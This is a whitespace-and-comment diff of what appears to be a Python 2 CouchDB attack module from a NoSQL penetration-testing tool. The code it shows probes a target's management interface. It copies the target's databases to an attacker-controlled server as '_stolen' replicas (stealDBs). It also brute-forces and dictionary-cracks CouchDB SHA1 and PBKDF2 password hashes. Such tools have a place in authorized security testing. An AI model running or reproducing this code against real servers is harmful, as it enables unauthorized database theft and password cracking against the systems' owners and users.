1414from hashlib import sha1
1515import os
1616
17+
1718global dbList
1819global yes_tag
1920global no_tag
2021yes_tag = ['y' , 'Y' ]
2122no_tag = ['n' , 'N' ]
2223
24+
2325def couchScan (target ,port ,pingIt ):
2426 if pingIt == True :
2527 test = os .system ("ping -c 1 -n -W 1 " + ip + ">/dev/null" )
@@ -68,7 +70,7 @@ def netAttacks(target,port, myIP):
6870 mgtOpen = False
6971 webOpen = False
7072 mgtSelect = True
71- #This is a global for future use with other modules; may change
73+ # This is a global for future use with other modules; may change
7274 dbList = []
7375 print "Checking to see if credentials are needed..."
7476 needCreds = couchScan (target ,port ,False )
@@ -104,7 +106,7 @@ def netAttacks(target,port, myIP):
104106
105107
106108 mgtUrl = "http://" + target + ":" + str (port ) + "/_utils"
107- #Future rev: Add web management interface parsing
109+ # Future rev: Add web management interface parsing
108110 try :
109111 mgtRespCode = urllib .urlopen (mgtUrl ).getcode ()
110112 if mgtRespCode == 200 :
@@ -142,11 +144,13 @@ def netAttacks(target,port, myIP):
142144 if attack == "5" :
143145 return
144146
147+
145148def getPlatInfo (couchConn , target ):
146149 print "Server Info:"
147150 print "CouchDB Version: " + couchConn .version ()
148151 return
149152
153+
150154def enumAtt (conn ,target ):
151155 dbList = []
152156 print "Enumerating all attachments..."
@@ -208,6 +212,7 @@ def enumDbs (couchConn,target,port):
208212
209213 return
210214
215+
211216def stealDBs (myDB ,couchConn ,target ,port ):
212217 dbLoot = True
213218 menuItem = 1
@@ -234,7 +239,7 @@ def stealDBs (myDB,couchConn,target,port):
234239 break
235240
236241 try :
237- #Create the DB target first
242+ # Create the DB target first
238243 myServer = couchdb .Server ("http://" + myDB + ":5984" )
239244 targetDB = myServer .create (dbList [int (dbLoot )- 1 ] + "_stolen" )
240245 couchConn .replicate (dbList [int (dbLoot )- 1 ],"http://" + myDB + ":5984/" + dbList [int (dbLoot )- 1 ] + "_stolen" )
@@ -251,6 +256,7 @@ def stealDBs (myDB,couchConn,target,port):
251256 raw_input ("Something went wrong. Are you sure your CouchDB is running and options are set? Press enter to return..." )
252257 return
253258
259+
254260def passCrack (user , encPass , salt , dbVer ):
255261 select = True
256262 print "Select password cracking method: "
@@ -273,9 +279,11 @@ def passCrack (user, encPass, salt, dbVer):
273279 return
274280 return
275281
282+
276283def genBrute (chars , maxLen ):
277284 return ('' .join (candidate ) for candidate in itertools .chain .from_iterable (itertools .product (chars , repeat = i ) for i in range (1 , maxLen + 1 )))
278285
286+
279287def brute_pass (hashVal ,salt ,dbVer ):
280288 charSel = True
281289 print "\n "
@@ -313,7 +321,7 @@ def brute_pass(hashVal,salt,dbVer):
313321 print "\r Combinations tested: " + str (count ) + "\r "
314322 count += 1
315323
316- #CouchDB hashing method changed starting with v1.3. Decide based on DB version which hash method to use.
324+ # CouchDB hashing method changed starting with v1.3. Decide based on DB version which hash method to use.
317325 if float (dbVer [0 :3 ]) < 1.3 :
318326 gotIt = gen_pass_couch (attempt ,salt ,hashVal )
319327 else :
@@ -322,6 +330,7 @@ def brute_pass(hashVal,salt,dbVer):
322330 if gotIt == True :
323331 break
324332
333+
325334def dict_pass (key ,salt ,dbVer ):
326335 loadCheck = False
327336
@@ -341,7 +350,7 @@ def dict_pass(key,salt,dbVer):
341350 for passGuess in passList :
342351 temp = passGuess .split ("\n " )[0 ]
343352
344- #CouchDB hashing method changed starting with v1.3. Decide based on DB version which hash method to use.
353+ # CouchDB hashing method changed starting with v1.3. Decide based on DB version which hash method to use.
345354 if float (dbVer [0 :3 ]) < 1.3 :
346355 gotIt = gen_pass_couch (temp ,salt ,key )
347356 else :
@@ -352,6 +361,7 @@ def dict_pass(key,salt,dbVer):
352361
353362 return
354363
364+
355365def gen_pass_couch (passw , salt , hashVal ):
356366 if sha1 (passw + salt ).hexdigest () == hashVal :
357367 print "Password Cracked - " + passw
@@ -360,6 +370,7 @@ def gen_pass_couch(passw, salt, hashVal):
360370 else :
361371 return False
362372
373+
363374def gen_pass_couch13 (passw , salt , iterations , hashVal ):
364375 result = PBKDF2 (passw ,salt ,iterations ).read (20 )
365376 expected = a2b_hex (hashVal )
0 commit comments